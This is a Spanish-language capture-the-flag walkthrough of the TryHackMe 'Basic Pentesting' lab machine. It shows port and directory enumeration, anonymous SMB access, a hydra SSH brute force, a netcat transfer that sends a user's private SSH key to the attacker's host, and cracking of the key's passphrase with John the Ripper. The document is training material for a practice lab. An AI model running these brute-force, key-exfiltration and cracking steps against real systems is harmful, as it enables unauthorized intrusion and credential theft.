THM - Basic Pentesting (BasicPentestingJT)

--- title: THM - Basic Pentesting (BasicPentestingJT) chapter: 1 tags: [tryhackme] difficulty: easy --- # THM - Basic Pentesting (BasicPentestingJT) Penetración Básica: Esta es una máquina que te permite practicar el hacking de aplicaciones web y la escalada de privilegios. ![](https://i.imgur.com/moMbBki.png) En este conjunto de tareas aprenderás lo siguiente: * Fuerza bruta * Descifrado de hash * Enumeración de servicios * Enumeración de Linux El objetivo principal aquí es aprender tanto como sea posible. Asegúrate de estar conectado a nuestra red utilizando tu archivo de configuración de OpenVPN. Créditos a Josiah Pierce de Vulnhub. <https://tryhackme.com/room/basicpentestingjt> <iframe width="560" height="315" src="https://www.youtube.com/embed/SYniWFXyrhg" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe> ## Recopilación de información ### Enumeración de puertos ~~~shell sudo nmap -p- -sSCV --open --min-rate 5000 -vvv -n -Pn $IP -oG allPorts ~~~ ~~~shell Starting Nmap 7.80 ( https://nmap.org ) at 2023-07-06 22:24 -05 NSE: Loaded 151 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 22:24 Completed NSE at 22:24, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 22:24 Completed NSE at 22:24, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 22:24 Completed NSE at 22:24, 0.00s elapsed Initiating SYN Stealth Scan at 22:24 Scanning 10.10.157.219 [65535 ports] Discovered open port 445/tcp on 10.10.157.219 Discovered open port 139/tcp on 10.10.157.219 Discovered open port 22/tcp on 10.10.157.219 Discovered open port 80/tcp on 10.10.157.219 Discovered open port 8080/tcp on 10.10.157.219 Discovered open port 8009/tcp on 10.10.157.219 Completed SYN Stealth Scan at 22:24, 18.95s elapsed (65535 total ports) Initiating Service scan at 22:24 Scanning 6 services on 10.10.157.219 Completed Service scan at 22:25, 47.44s elapsed (6 services on 1 host) NSE: Script scanning 10.10.157.219. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 22:25 Completed NSE at 22:25, 6.52s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 22:25 Completed NSE at 22:25, 0.95s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 22:25 Completed NSE at 22:25, 0.00s elapsed Nmap scan report for 10.10.157.219 Host is up, received user-set (0.18s latency). Scanned at 2023-07-06 22:24:20 -05 for 74s Not shown: 65126 closed ports, 403 filtered ports Reason: 65126 resets and 403 no-responses Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZXasCfWSXQ9lYiKbTNkPs0T+wFym2lZy229LllhY6iDLrjm7LIkhCcrlgnJQtLxl5NPhlHNVmwhlkcPPiAHwluhMVE5xKihQj3i+Ucx2IwiFvfmCz4AKsWlR6N8IZe55Ltw0lcH9ykuKZddg81X85EVsNbMacJNjjyxAtwQmJt1F5kB1B2ixgjLLOyNWafC5g1h6XbEgB2wiSRJ5UA8rOZaF28YcDVo0MQhsKpQG/5oPmQUsIeJTUA/XkoWCjvXZqHwv8XInQLQu3VXKgv735G+CJaKzplh7FZyXju8ViDSAY8gdhqpJommYxzqu9s1M31cmFg2fT5V1z9s4DP/vd | 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBP0SXJpgwPf/e9AT9ri/dlAnkob4PqzMjl2Q9lZIVIXeEFJ9sfRkC+tgSjk9PwK0DUO3JU27pmtAkDL4Mtv9eZw= | 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAzy8ZacWXbPGeqtuiJCnPP0LYZYZlMj5D1ZY9ldg1wU 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 8009/tcp open ajp13 syn-ack ttl 63 Apache Jserv (Protocol v1.3) | ajp-methods: |_ Supported methods: GET HEAD POST OPTIONS 8080/tcp open http-proxy syn-ack ttl 63 | fingerprint-strings: | Socks4, Socks5: | HTTP/1.1 400 | Content-Type: text/html;charset=utf-8 | Content-Language: en | Content-Length: 2243 | Date: Fri, 07 Jul 2023 03:25:10 GMT | Connection: close | <!doctype html><html lang="en"><head><title>HTTP Status 400 |_ Request</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><bod |_http-favicon: Apache Tomcat | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Apache Tomcat/9.0.7 ... ~~~ * 22 sshd * 80 Apache2 * 139 smbd * 445 smbd * 8009 JServ <https://book.hacktricks.xyz/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp> * 8080 Tomcat <https://4sysops.com/archives/smb-port-number-ports-445-139-138-and-137-explained/> ### Enumeración de directorios ~~~shell git clone https://github.com/danielmiessler/SecLists.git /usr/share/SecList ~~~ ~~~shell wfuzz -w /usr/share/SecList/Discovery/Web-Content/common.txt -u $IP/FUZZ --hc=404 -t 35 ~~~ ~~~shell ******************************************************** * Wfuzz 2.4.5 - The Web Fuzzer * ******************************************************** Target: http://10.10.157.219/FUZZ Total requests: 4715 =================================================================== ID Response Lines Word Chars Payload =================================================================== 000000023: 403 11 L 32 W 292 Ch ".hta" 000000024: 403 11 L 32 W 297 Ch ".htaccess" 000000025: 403 11 L 32 W 297 Ch ".htpasswd" 000001451: 301 9 L 28 W 320 Ch "development" 000002194: 200 10 L 24 W 158 Ch "index.html" 000003712: 403 11 L 32 W 301 Ch "server-status" Total time: 32.55689 Processed Requests: 4715 Filtered Requests: 4709 Requests/sec.: 144.8234 ~~~ **Flag \#3:** *What is the name of the hidden directory on the web server(enter name without /)?*: `development` Ahora exploramos la ruta`development`: ![](https://hackmd.io/_uploads/ry4RC-rKn.png) ~~~shell $ curl http://$IP/development/dev.txt ~~~ ~~~plaintext 2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat to host that on this server too. Haven't made any real web apps yet, but I have tried that example you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm using version 2.5.12, because other versions were giving me trouble. -K 2018-04-22: SMB has been configured. -K 2018-04-21: I got Apache set up. Will put in our content later. -J ~~~ ~~~shell $ curl http://$IP/development/j.txt ~~~ ~~~plaintext For J: I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials, and I was able to crack your hash really easily. You know our password policy, so please follow it? Change that password ASAP. -K ~~~ ## Evaluación de vulnerabilidades ### Puerto 445 ~~~shell $ smbclient -L $IP -N Sharename Type Comment --------- ---- ------- Anonymous Disk IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu) SMB1 disabled -- no workgroup available ~~~ ~~~shell $ smblcient //$IP/Anonymmoous -N Try "help" to get a list of possible commands. smb: \> ls . D 0 Thu Apr 19 12:31:20 2018 .. D 0 Thu Apr 19 12:13:06 2018 staff.txt N 173 Thu Apr 19 12:29:55 2018 14318640 blocks of size 1024. 11094472 blocks available smb: \> get staff.txt getting file \staff.txt of size 173 as staff.txt (0,2 KiloBytes/sec) (average 0,2 KiloBytes/sec) smb: \> exit ~~~ ~~~shell $ cat staff.txt ~~~ ~~~plaintext Announcement to staff: PLEASE do not upload non-work-related items to this share. I know it's all in fun, but this is how mistakes happen. (This means you too, Jan!) -Kay ~~~ **Flag \#9** *What is the name of the other user you found(all lower case)?*: `Kay` **Flag \#5** *What is the username?*: `Jan` ## Los usuarios son case-sensitive > Just like hostnames and domain names, the username is not strictly a Unix thing but can and often does span a wider range of OS types. > > Whether they will be considered case sensitive depends then on the standard used to specify them. > > Hostnames and domain names are clearly case insensitive by the DNS standard (see RFC4343). > > Usernames stored on a local backend (/etc/passwd) or a Unix style one (NIS) are not case insensitive by the POSIX standard. > > Usernames stored in an LDAP or an Active Directory backend will follow the used attribute schema definition, uid and cn which are often storing the user name have a differing schema attributes, case insensitive for the former but case sensitive for the latter. That means both Abc and abc might match or not abc's entry depending on the ldap server configuration. > > Due to this inconsistency, I would recommend to only use lowercase for both usernames and host/domain name and then avoid ssh ABC@SERVERNAME.DOMAIN.COM which is rude anyway. <https://unix.stackexchange.com/a/235086/445265> ## Part 2 ~~~shell wget https://github.com/praetorian-inc/Hob0Rules/raw/master/wordlists/rockyou.txt.gz -o /usr/share/wordlist/rockyou.txt.gz gzip -d /usr/share/wordlist/rockyou.txt.gz ~~~ Limitar la cantidad de caracteres en el diccionario porque en el input de la bandera notamos que es de longitud 7: ![](https://hackmd.io/_uploads/BkuFISIth.png) ~~~shell grep -oE '^.{7}$' /usr/share/wordlist/rockyou.txt > /usr/share/wordlist/rockyou-7.txt egrep -o '^.{7}$' /usr/share/wordlist/rockyou.txt > /usr/share/wordlist/rockyou-7.txt ~~~ ~~~shell $ hydra ssh://$IP -l jan -P /usr/share/wordlist/rockyou-7.txt Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-07 21:13:38 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 2507225 login tries (l:1/p:2507225), ~156702 tries per task [DATA] attacking ssh://10.10.219.185:22/ [STATUS] 178.00 tries/min, 178 tries in 00:01h, 2507052 to do in 234:45h, 16 active [22][ssh] host: 10.10.219.185 login: jan password: armando 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 5 final worker threads did not complete until end. [ERROR] 5 targets did not resolve or could not be connected [ERROR] 0 targets did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-07-07 21:15:16 ~~~ **Flag \#6:** *What is the password?*: `armando` ### Conexión SSH Iniciamos la sessión SSH con `jan` y y contraseña `armando` ~~~shell ssh jan@$IP jan@basic2:~$ ~~~ ~~~shell jan@basic2:~$ ls /home -al total 16 drwxr-xr-x 4 root root 4096 Apr 19 2018 . drwxr-xr-x 24 root root 4096 Apr 23 2018 .. drwxr-xr-x 2 root root 4096 Apr 23 2018 jan drwxr-xr-x 5 kay kay 4096 Apr 23 2018 kay ~~~ ~~~shell jan@basic2:~$ cd /home/kay jan@basic2:/home/kay$ ls -al total 48 drwxr-xr-x 5 kay kay 4096 Apr 23 2018 . drwxr-xr-x 4 root root 4096 Apr 19 2018 .. -rw------- 1 kay kay 756 Apr 23 2018 .bash_history -rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout -rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc drwx------ 2 kay kay 4096 Apr 17 2018 .cache -rw------- 1 root kay 119 Apr 23 2018 .lesshst drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano -rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh -rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful -rw------- 1 root kay 538 Apr 23 2018 .viminfo -rw------- 1 kay kay 57 Apr 23 2018 pass.bak ~~~ ~~~shell cd .ssh ls -al total 20 drwxr-xr-x 2 kay kay 4096 Apr 23 2018 . drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .. -rw-rw-r-- 1 kay kay 771 Apr 23 2018 authorized_keys -rw-r--r-- 1 kay kay 3326 Apr 19 2018 id_rsa -rw-r--r-- 1 kay kay 771 Apr 19 2018 id_rsa.pub ~~~ La llave pirvada es cifrada con un *passphrase* que tenemos crackear. Pasamos la llave privada a la máquina del atacante: ~~~shell uqnar@un:~$ nc -nlvp 5000 > id_rsa ~~~ ~~~shell jan@basic2:/home/kay$ nc 10.18.41.138 5000 < id_rsa ~~~ Obtenemos el hash para JohnTheRipper ~~~shell uqnar@un:~/tmp$ ssh2john id_rsa > hash ~~~ ~~~shell $ sudo john -w:/usr/share/wordlists/rockyou.txt ./hash Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status beeswax (id_rsa) 1g 0:00:00:00 DONE (2023-07-07 22:52) 1.388g/s 114911p/s 114911c/s 114911C/s behlat..bball40 Use the "--show" option to display all of the cracked passwords reliably Session completed. ~~~ ~~~shell $ sudo john -w:/usr/share/wordlists/rockyou.txt ./hash Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) No password hashes left to crack (see FAQ) ~~~ ~~~shell sudo john --show ./hash id_rsa:beeswax 1 password hash cracked, 0 left ~~~ ~~~shell jan@basic2:/home/kay/.ssh$ ssh -i id_rsa kay@localhost Could not create directory '/home/jan/.ssh'. The authenticity of host 'localhost (::1)' cant be established. ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ. Are you sure you want to continue connecting (yes/no)? yes Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts). Enter passphrase for key 'id_rsa': Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 0 packages can be updated. 0 updates are security updates. Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102 kay@basic2:~$ ~~~ ~~~shell kay@basic2:~$ ls pass.bak kay@basic2:~$ cat pass.bak heresareallystrongpasswordthatfollowsthepasswordpolicy$$ ~~~